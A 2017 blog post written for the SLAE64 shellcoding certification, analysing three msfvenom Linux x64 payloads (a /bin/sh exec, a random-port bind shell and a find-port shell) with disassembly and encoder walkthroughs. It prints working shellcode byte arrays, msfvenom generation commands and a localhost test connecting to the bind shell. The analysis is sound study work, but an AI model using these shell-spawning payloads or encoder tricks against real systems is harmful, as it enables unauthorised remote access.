Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
Security Tube SLAE64 Course - Assessment 5 - Metasploit Payload Analysis
Posted: 22 Nov 2017 at 11:10 by Codehead

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the fifth assignment; analyse 3 payloads generated by the Metasploit msfvenom tool.

msfvenom is a replacement for msfpayload and msfencode tools. It combines their functionality into a single application. The available payloads specifically for x64 Linux are quite limited:

root@kali:~# msfvenom -l | grep linux/x64

linux/x64/exec                                      Execute an arbitrary command
linux/x64/meterpreter/bind_tcp                      Inject the mettle server payload (staged). Listen for a connection
linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
linux/x64/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
linux/x64/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
linux/x64/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
linux/x64/shell_bind_tcp                            Listen for a connection and spawn a command shell
linux/x64/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. 
                                                    Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x64/shell_find_port                           Spawn a shell on an established connection
linux/x64/shell_reverse_tcp                         Connect back to attacker and spawn a command shell

To make things interesting, I let the system pick three payloads at random:

root@kali:~# msfvenom -l | grep linux/x64 | sort -R | head -n 3
linux/x64/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. 
                                                    Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x64/exec                                      Execute an arbitrary command
linux/x64/shell_find_port                           Spawn a shell on an established connection

A simple exec

Let’s look at exec first as it will probably be the simplest. This payload allows execution of an arbitrary command. We set the CMD parameter to specify the command we would like to execute. We’ll use a simple sh call for the demo and ask for the output in a ‘C’ style char array:

root@kali:~# msfvenom -p linux/x64/exec CMD=sh -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 42 bytes
Final size of c file: 201 bytes
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x03\x00"
"\x00\x00\x73\x68\x00\x56\x57\x48\x89\xe6\x0f\x05";

The 42 byte payload is nice and compact, but we can clearly see that there are some NULL bytes in there.

The tool allows us to specify ‘bad’ characters and will use encoding to remove them.

root@kali:~# msfvenom -p linux/x64/exec CMD=sh -b '\x00' -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=13, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 87 (iteration=0)
x64/xor chosen with final size 87
Payload size: 87 bytes
Final size of c file: 390 bytes
unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xb8\xe5\xd4\xb4\x73\x27\x43\xcf\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xd2\xde\x8c\x2d\x3b\x9c"
"\x6c\xad\xd1\x8b\xfb\xc7\x1b\x27\x10\x87\x31\x02\xbc\x99\x10"
"\x27\x43\x87\x31\x03\x86\x5c\x70\x27\x43\xcf\xcb\x8d\xd4\xe2"
"\x24\x6f\xca\x29\xb7\xe0\xd4\xb4\x73\x27\x43\xcf";

Now the payload is clear of bad chars, but is up to 87 bytes. We can see from the messages that an XOR encoder has been used, so let’s see how it all works.

Decoding the payload

Using the shellcode wrapper we can compile the output and use objdump to extract the code section:

codehead@ubuntu:~$ objdump -D shellcode -M intel

...

0000000000601040 <code>:
  601040:   48 31 c9                xor    rcx,rcx
  601043:   48 81 e9 fa ff ff ff    sub    rcx,0xfffffffffffffffa
  60104a:   48 8d 05 ef ff ff ff    lea    rax,[rip+0xffffffffffffffef]
  601051:   48 bb b8 e5 d4 b4 73    movabs rbx,0xcf432773b4d4e5b8
  601058:   27 43 cf 
  60105b:   48 31 58 27             xor    QWORD PTR [rax+0x27],rbx
  60105f:   48 2d f8 ff ff ff       sub    rax,0xfffffffffffffff8
  601065:   e2 f4                   loop   60105b <code+0x1b>
  601067:   d2 de                   rcr    dh,cl
  601069:   8c 2d 3b 9c 6c ad       mov    WORD PTR [rip+0xffffffffad6c9c3b],gs
  60106f:   d1 8b fb c7 1b 27       ror    DWORD PTR [rbx+0x271bc7fb],1
  601075:   10 87 31 02 bc 99       adc    BYTE PTR [rdi-0x6643fdcf],al
  60107b:   10 27                   adc    BYTE PTR [rdi],ah
  60107d:   43 87 31                rex.XB xchg DWORD PTR [r9],esi
  601080:   03 86 5c 70 27 43       add    eax,DWORD PTR [rsi+0x4327705c]
  601086:   cf                      iret   
  601087:   cb                      retf   
  601088:   8d                      (bad)  
  601089:   d4                      (bad)  
  60108a:   e2 24                   loop   6010b0 <_end+0x8>
  60108c:   6f                      outs   dx,DWORD PTR ds:[rsi]
  60108d:   ca 29 b7                retf   0xb729
  601090:   e0 d4                   loopne 601066 <code+0x26>
  601092:   b4 73                   mov    ah,0x73
  601094:   27                      (bad)  
  601095:   43 cf                   rex.XB iret 

The result is a bit of a mess. However, we know that an XOR decoder is lurking in the header and the code would be mangled after a certain point. The instructions up to the loop at 601065 look reasonable so let see what they do.

The first two lines of code clear RCX and subtract a large negative 64bit number from the register, this sets a value of 6 in the register. As RCX is generally used for loop control, we can assume that we should expect 6 iterations of an operation to occur soon.

xor    rcx,rcx
sub    rcx,0xfffffffffffffffa

The next line uses a RIP relative offset to get the address of the start of the code block into RAX.

lea    rax,[rip+0xffffffffffffffef]

The next instruction loads an 8 byte sequence into RBX. This looks like the XOR key that will be used to decrypt the mangled code. Tests with msfvenom show that this key is randomly generated each time the tool runs.

movabs rbx,0xcf432773b4d4e5b8

The next three lines are the decode loop. The key value from RBX is XORed with contents of the address referenced by RAX plus an offset of 0x27. This reference resolves as the first line after the loop instruction. RAX then has a value of -8 subtracted from it, moving the RAX+0x27 reference to the next block to be decoded. Finally a loop statement causes the block to be executed RCX times.

_decode:
xor    QWORD PTR [rax+0x27],rbx
sub    rax,0xfffffffffffffff8
loop   _decode

Once the loop has completed 6 iterations, the decoded shellcode is clear:

loop   _decode

<code+39> push   0x3b
<code+41> pop    rax
<code+42> cdq
<code+43> movabs rbx,0x68732f6e69622f 
<code+53> push   rbx
<code+54> mov    rdi,rsp
<code+57> push   0x632d
<code+62> mov    rsi,rsp
<code+65> push   rdx
<code+66> call   <code+74>
<code+71> jae    0x6010f1
<code+73> add    BYTE PTR [rsi+0x57],dl
<code+76> mov    rsi,rsp
<code+79> syscall

The decoder actually overruns the end of the shellcode, resulting in a sequence of zeros which GDB interprets as add BYTE PTR [rax],al statements Those instructions aren’t going to be hit until our shell returns so we don’t need to worry about them.

Examining the Payload

This payload is a simple execve call. We’ve seen this before in the first assignment, the parameters for the syscall are:

ID / RAX Name Arg1 / RDI Arg2 / RSI Arg3 / RDX
59 sys_execve const char *filename const char *const argv[] const char *const envp[]

The first two instructions set RAX to 0x3b (59 decimal) using PUSH and POP. This value is the ID value of sys_execve. The third line uses CDQ as a compact method of clearing RDX. The sign bit of RAX is extended it across RDX, neatly clearing the register with a one byte instruction.

The next few lines push the string ‘/bin/sh’ and our command ‘sh’ on to the stack as hex values and move the respective RSP values into RSI and RDI, storing the addresses of the strings. At this point it seems that the ‘sh’ command is redundant, but the code works so we’ll leave it in place.

The RDX register is pushed to zero terminate the arguments array which will be built in the next few instructions.

At this point the instructions start to become confusing. The CALL instruction doesn’t seem to land cleanly on the start of a line and the JAE and ADD instructions don’t make much sense in context.

Closer analysis of the raw hex at the location shows that GDB has been confused by an inline string:

(gdb) x/10bx 0x601087
0x601087 <code+71>:     0x73    0x68    0x00    0x56    0x57    0x48    0x89    0xe6
0x60108f <code+79>:     0x0f    0x05

The byte sequence 0x73,0x68,0x00 is a NULL terminated string containing ‘sh’. Disassembling the remaining bytes which align with the CALL <code+74> location, we see the actual instructions that will be executed:

(gdb) x/5i 0x60108a
   0x60108a <code+74>:  push   rsi
   0x60108b <code+75>:  push   rdi
   0x60108c <code+76>:  mov    rsi,rsp
   0x60108f <code+79>:  syscall 
   0x601091 <code+81>:  add    BYTE PTR [rax],al

The CALL simply skips over the string while placing its address on the stack. The next few lines push the stored memory references from RSI and RDI onto the stack, forming the rest of the argument array. Shifting RSP into RSI completes the set up of the arguments and the SYSCALL instruction will invoke our shell.

Analysing this code was useful in showing that GDB’s output isn’t always to be trusted. There were also some very nice size optimisation tricks that will help with future shellcode building.

Random TCP Port Bind Shell

The second example for dissection and analysis is a random port bind shell spawns a port just like our example from assessment 1, but the port is chosen at random and must be found by scanning the target with netcat.

The basic output from msfvenom for this module is 57 bytes with no NULL characters, but I decided to try a different encoder on this payload to make things more interesting. There are only two encoders listed for x64: The XOR encoder and one I’d never heard of called zutto_dekiru.

Using zutto_dekiru generates a 115 byte payload:

root@kali:~# msfvenom -p linux/x64/shell_bind_tcp_random_port -f c -e x64/zutto_dekiru
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/zutto_dekiru
x64/zutto_dekiru succeeded with size 115 (iteration=0)
x64/zutto_dekiru chosen with final size 115
Payload size: 115 bytes
Final size of c file: 508 bytes
unsigned char buf[] = 
"\x48\xbd\x0f\x7b\x81\x33\x27\xae\x37\xf3\x54\xd9\xe9\x4d\x31"
"\xd2\x41\x5b\x66\x41\x81\xe3\xb0\xfa\x41\xb2\x08\x49\x0f\xae"
"\x03\x49\x83\xc3\x08\x4d\x8b\x3b\x49\xff\xca\x4b\x31\x6c\xd7"
"\x28\x4d\x85\xd2\x75\xf3\x47\x4a\x77\x7b\xd0\x48\xc8\x35\x65"
"\x79\xde\x83\x0e\xa1\x32\xa1\x51\x2b\xde\x83\x15\xa1\x32\x43"
"\x24\x74\x84\x64\x79\xe6\xa0\x0c\xc1\xcb\xa0\x3c\x22\xdb\xcf"
"\xa1\x47\xc4\xae\x1c\x45\xc7\x59\xdc\x7c\x13\xd6\x67\x78\x1e"
"\x0c\xfc\x0a\x66\x35\xa4\xf2\x7a\x80\xba";

Testing the payload in the shellcode wrapper shows that everything works as expected. Once the payload is running, nmap quickly finds the port and we can connect as before.

MBP:slae64$ gcc -z execstack -fno-stack-protector shellcode_wrapper.c -o shellcode
MBP:slae64$ ./shellcode &
[1] 22768
Shellcode Length:  115

MBP:slae64$ sudo nmap -sS 127.0.0.1 -p-

Starting Nmap 5.21 ( http://nmap.org ) at 2017-11-20 10:29 GMT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000010s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
631/tcp   open  ipp
36328/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

MBP:slae64$ cd ~/
MBP:~$ nc 127.0.0.1 36328
pwd
/home/codehead/SLAE64
exit
[1]+  Done                    ./shellcode  (wd: ~/SLAE64)
(wd now: ~)
MBP:~$

Unpicking Zutto Dekiru

A quick dump of the GDB disassembly looks pretty confusing:

<code>      movabs rbp,0xf337ae2733817b0f             
<code+10>   push   rsp                                
<code+11>   fldl2t                                    
<code+13>   xor    r10,r10                            
<code+16>   pop    r11                                
<code+18>   and    r11w,0xfab0                        
<code+24>   mov    r10b,0x8                           
<code+27>   fxsave64 [r11]                            
<code+31>   add    r11,0x8                            
<code+35>   mov    r15,QWORD PTR [r11]                
<code+38>   dec    r10                                
<code+41>   xor    QWORD PTR [r15+r10*8+0x28],rbp     
<code+46>   test   r10,r10                            
<code+49>   jne    <code+38>                
<code+51>   rex.RXB                                   
<code+52>   rex.WX ja                        
<code+55>   ror    BYTE PTR [rax-0x38],1              
<code+58>   xor    eax,0x83de7965                     
<code+63>   (bad)                                     
<code+64>   movabs eax,ds:0xa11583de2b51a132          
<code+73>   xor    al,BYTE PTR [rbx+0x24]             
<code+76>   je                               
<code+78>   fs                                        
<code+79>   jns    <code+55>                
<code+81>   movabs al,ds:0xcfdb223ca0cbc10c           
<code+90>   movabs eax,ds:0xdc59c7451caec447          
<code+99>   jl     <completed.6531>          
<code+101>  (bad)                                     
<code+102>  addr32 js <dtor_idx.6533+7>      
<code+105>  or     al,0xfc                            
<code+107>  or     ah,BYTE PTR [rsi+0x35]             
<code+110>  movs   BYTE PTR es:[rdi],BYTE PTR ds:[rsi]
<code+111>  repnz jp <__dso_handle+10>       
<code+114>  mov    edx,0x0  

We can assume that the code later in the module is encoded, but even the top section looks pretty strange. At first glance we can guess that the work is done between <code+38> and the JNE loop at <code+49> with quite a bit of setup beforehand.

After analysing the code in GDB, the function of the header becomes clear. The FLDL2T instruction loads the ST0 floating point register with a constant calculated from log_2(10). The actual value is irrelevant, what the code is really doing is finding its own location in memory. Floating point operations have their own control registers and all of the extended registers can be saved to a memory location using the FXSAVE64 instruction.

The floating point registers can be viewed in GDB as part of the extended register dump:

(gdb) info all-registers
...
fctrl       0x37f    895
fstat       0x3800   14336
ftag        0x3fff   16383
fiseg       0x0      0
fioff       0x60104b 6295627
foseg       0x0      0
fooff       0x0      0
fop         0x0      0
...

So the inclusion of the FLDL2T instruction is purely to ensure that the floating point registers are used and the FPU IP register (FIOFF) will contain the address of the opcode.

We see a few instructions which store the stack pointer and apply an offset, this is to make room on the stack for the data generated by the FXSAVE64 operation which uses 512 bytes to store all of the extended registers. Interestingly, the AND operation at <code+18> only seems to generate 264 bytes of space and the FXSAVE64 operation overwrites the current stack. However, this does cause any problems during execution.

After storing the extended register values, the ADD and MOV operations at <code+31> and <code+35> retrieve the address of the FLDL2T instruction from the FPU IP field and store it in R15. Now that we have an absolute reference to our code in memory, R10 is used as a counter and offset to apply an XOR key to the encoded payload.

The 8 byte XOR key is loaded into RBP at the start of the code. The complex XOR statement at <code+41> uses an offset of 0x28 added to the absolute value from R15 to locate the start of the encoded payload (<code+51>). An additional step offset is created by multiplying the counter value in R10 by 8. As the value in R10 is decremented with each pass, the calculated offset reduces by 8 bytes each time, meaning the code is decoded from the bottom upwards. When R10 reaches zero, the JNE test at <code+49> fails and execution passes to the freshly decoded payload.

Analysing the Payload

The decoded payload looks like this:

<code+51>      xor    rsi,rsi
<code+54>      mul    rsi
<code+57>      inc    esi
<code+59>      push   0x2
<code+61>      pop    rdi
<code+62>      mov    al,0x29                
<code+64>      syscall                       
<code+66>      push   rdx                    
<code+67>      pop    rsi                    
<code+68>      push   rax                    
<code+69>      pop    rdi                    
<code+70>      mov    al,0x32                
<code+72>      syscall                       
<code+74>      mov    al,0x2b                
<code+76>      syscall                       
<code+78>      push   rdi                    
<code+79>      pop    rsi                    
<code+80>      xchg   rdi,rax                
<code+82>      dec    esi                    
<code+84>      mov    al,0x21                
<code+86>      syscall                       
<code+88>      jne    <code+82>     
<code+90>      push   rdx                    
<code+91>      movabs rdi,0x68732f6e69622f2f 
<code+101>     push   rdi                    
<code+102>     push   rsp                    
<code+103>     pop    rdi                    
<code+104>     mov    al,0x3b                
<code+106>     syscall                       
<code+108>     sbb    eax,0xd4d597b4         
<code+113>     mov    bh,0x49                
<code+115>     add    BYTE PTR [rax],al 

As we’ve already built a bind shell in assessment 1, the general structure of the code is pretty familiar. The first 7 lines are concerned with using syscall 0x29, SYS_SOCKET to create a TCP INET socket. Clearing RSI with XOR then using MUL on the empty register clears out RAX and RDX in an efficient manner. Setting the usual arguments of AF_INET (2) and SOCK_STREAM (1) creates a standard socket when the syscall is executed.

At this point we would normally bind the socket to a port before listening for connections. The description of the payload described a randomly allocated port and I was looking forward to seeing some interesting random number generation code. However, the next section invokes syscall 0x32, SYS_LISTEN.

<code+66>      push   rdx                    
<code+67>      pop    rsi                    
<code+68>      push   rax                    
<code+69>      pop    rdi                    
<code+70>      mov    al,0x32                
<code+72>      syscall  

We know that the code works, so there must be something else happening here. After reviewing the BSD Sockets documentation, I discovered the following useful nugget:


It is not necessary to bind a socket prior to connecting it. If a socket is not bound the library will choose the local port and IP.


This is handy as it also removes the overhead of building a SOCKADDR_IN structure. The SYS_LISTEN call which moves the code into a blocking state is unremarkable, a few values such as the socket ID are switched from other registers to build the arguments.

When a connection is received, the SYS_ACCEPT call is surprisingly brief.

<code+74>      mov    al,0x2b                
<code+76>      syscall     

The ID value of 0x2b is placed in RAX and then the syscall is invoked with no other arguments in place. Dynamic analysis with GDB shows that RSI and RDX arguments are zero, so the pointers are NULL and the SOCKADDR_IN and size data is discarded. This is an unexpected shortcut, but the returned information is not used so it makes sense to optimise it away if the system allows.

Once the incoming connection has been accepted, another surprising optimisation is found for the SYS_DUP2 section dealing with directing I/O descriptors through the new socket.

<code+78>      push   rdi                    
<code+79>      pop    rsi                    
<code+80>      xchg   rdi,rax                
<code+82>      dec    esi                    
<code+84>      mov    al,0x21                
<code+86>      syscall                       
<code+88>      jne    <code+82>     

Normally we would duplicate descriptors 0, 1 and 2 or STDERR, STDOUT and STDIN. However, the code reuses the the original socket ID value returned from SYS_SOCKET as the descriptor ID and enters a tight loop which repeatedly decrements the descriptor value and calls SYS_DUP2. Observations of socket ID values show that they start at least 7 or 8 on a quiet system, so SYS_DUP2 ends up making a few invalid calls. The loop is conditional on the return from SYS_DUP2 being zero, this only occurs when the input descriptor ID reaches zero. So a trade off between shellcode size and a few invalid calls acheives the desired I/O redirection result with minimal juggling of parameters.

The last section of code is a SYS_EXECVE call.

<code+90>      push   rdx                    
<code+91>      movabs rdi,0x68732f6e69622f2f 
<code+101>     push   rdi                    
<code+102>     push   rsp                    
<code+103>     pop    rdi                    
<code+104>     mov    al,0x3b                
<code+106>     syscall                 

We have done enough of these over the last few assessments to know how this works. The string ‘\bin\sh’ is used for the command. Unusually, the arguments array at RSI is empty, but the call still has the desired effect.

The remaining instructions from <code+108> are artefacts of the decoding process and are ignored.

This code was surprising in its simplicity and showed that many shortcuts are possible when using syscalls, resulting in very compact shellcode.

Spawning a Shell on an Existing Connection

The third and last sample payload also spawns a shell, but this time the description states that an existing connection will be used. As both of the x64 encoders have been examined and the default generated shellcode for this payload contains no NULL values, this sample with be analysed with no encoding.

Payload options include specifying the local port so the following sample was generated:

root@kali:~# msfvenom -p linux/x64/shell_find_port -f c CPORT=5555
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
Final size of c file: 409 bytes
unsigned char buf[] = 
"\x48\x31\xff\x48\x31\xdb\xb3\x14\x48\x29\xdc\x48\x8d\x14\x24"
"\x48\x8d\x74\x24\x04\x6a\x34\x58\x0f\x05\x48\xff\xc7\x66\x81"
"\x7e\x02\x15\xb3\x75\xf0\x48\xff\xcf\x6a\x02\x5e\x6a\x21\x58"
"\x0f\x05\x48\xff\xce\x79\xf6\x48\x89\xf3\xbb\x41\x2f\x73\x68"
"\xb8\x2f\x62\x69\x6e\x48\xc1\xeb\x08\x48\xc1\xe3\x20\x48\x09"
"\xd8\x50\x48\x89\xe7\x48\x31\xf6\x48\x89\xf2\x6a\x3b\x58\x0f"
"\x05";

When running the payload under the shellcode wrapper I was unable to get the shell to spawn due to constant EBADF (Bad file descriptor) errors even when reading the active socket. As a result the analysis has to be done statically.

The disassembled shellcode looks like this:

<code>         xor    rdi,rdi               
<code+3>       xor    rbx,rbx                   
<code+6>       mov    bl,0x14                   
<code+8>       sub    rsp,rbx                     
<code+11>      lea    rdx,[rsp]               
<code+15>      lea    rsi,[rsp+0x4]     
<code+20>      push   0x34                      
<code+22>      pop    rax                       
<code+23>      syscall                            
<code+25>      inc    rdi                       
<code+28>      cmp    WORD PTR [rsi+0x2],0xb315 
<code+34>      jne    <code+20>   
<code+36>      dec    rdi                       
<code+39>      push   0x2                       
<code+41>      pop    rsi                       
<code+42>      push   0x21                      
<code+44>      pop    rax                       
<code+45>      syscall                   
<code+47>      dec    rsi                       
<code+50>      jns    <code+42>  
<code+52>      mov    rbx,rsi                   
<code+55>      mov    ebx,0x68732f41            
<code+60>      mov    eax,0x6e69622f            
<code+65>      shr    rbx,0x8                   
<code+69>      shl    rbx,0x20                  
<code+73>      or     rax,rbx                   
<code+76>      push   rax                       
<code+77>      mov    rdi,rsp                   
<code+80>      xor    rsi,rsi                   
<code+83>      mov    rdx,rsi                   
<code+86>      push   0x3b                      
<code+88>      pop    rax                       
<code+89>      syscall 

We can see three sections, corresponding to three syscalls.

The first section uses SYS_GETPEERNAME to retrieve information about socket state. The function template is:

ID / RAX Name Arg1 / RDI Arg2 / RSI Arg3 / RDX
52 sys_getpeername int fd struct sockaddr *sockaddr int *sockaddr_len

The RDI register (socket ID) is cleared and 20 bytes of stack space is reserved for the sockaddr structure and its accompanying size value pointer. The code then loops, incrementing the socket ID, executing the syscall and checking the sockaddr structure for our target port value (5555). As a socket ID is a 16 bit unsigned value, the maximum number of sockets per interface is 65,535 and this loop scans quickly over the range.

Once a socket connected to the target port is found, the code moves on to duplicating the I/O descriptors into the target socket.

<code+36>      dec    rdi
<code+39>      push   0x2                       
<code+41>      pop    rsi                       
<code+42>      push   0x21                      
<code+44>      pop    rax                       
<code+45>      syscall                   
<code+47>      dec    rsi                       
<code+50>      jns    <code+42> 

This section is similar to the cut down loop seen in the previous payload. The socket ID is already in RDI although a decrement is required to counteract the action of the scanning loop. The descriptor ID in RSI is manually set to 2 and the same loop/decrement process is used to duplicate STDERR, STDOUT and STDIN. JNS is used to end the loop when RSI becomes a negative number.

The final section is an execve call to spawn a shell.

<code+47>      dec    rsi                       
<code+50>      jns    <code+42>  
<code+52>      mov    rbx,rsi                   
<code+55>      mov    ebx,0x68732f41            
<code+60>      mov    eax,0x6e69622f            
<code+65>      shr    rbx,0x8                   
<code+69>      shl    rbx,0x20                  
<code+73>      or     rax,rbx                   
<code+76>      push   rax                       
<code+77>      mov    rdi,rsp                   
<code+80>      xor    rsi,rsi                   
<code+83>      mov    rdx,rsi                   
<code+86>      push   0x3b                      
<code+88>      pop    rax                       
<code+89>      syscall 

The ‘\bin\sh’ string is built from two 32 bit values. An ‘A’ character is included to fill out the first chunk and some bit shifting is used to remove this extra character and make room for the second half of the string to be inserted with an OR operation. The final string is pushed onto the stack and the other parameters are left at 0.

Not being able to test the code is frustrating, but static analysis is a good exercise in confirming understanding of the assembly language.

This completes the three payload analysis assignment.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64-1471


Site powered by Hugo.
Polymer theme by pdevty, tweaked by Codehead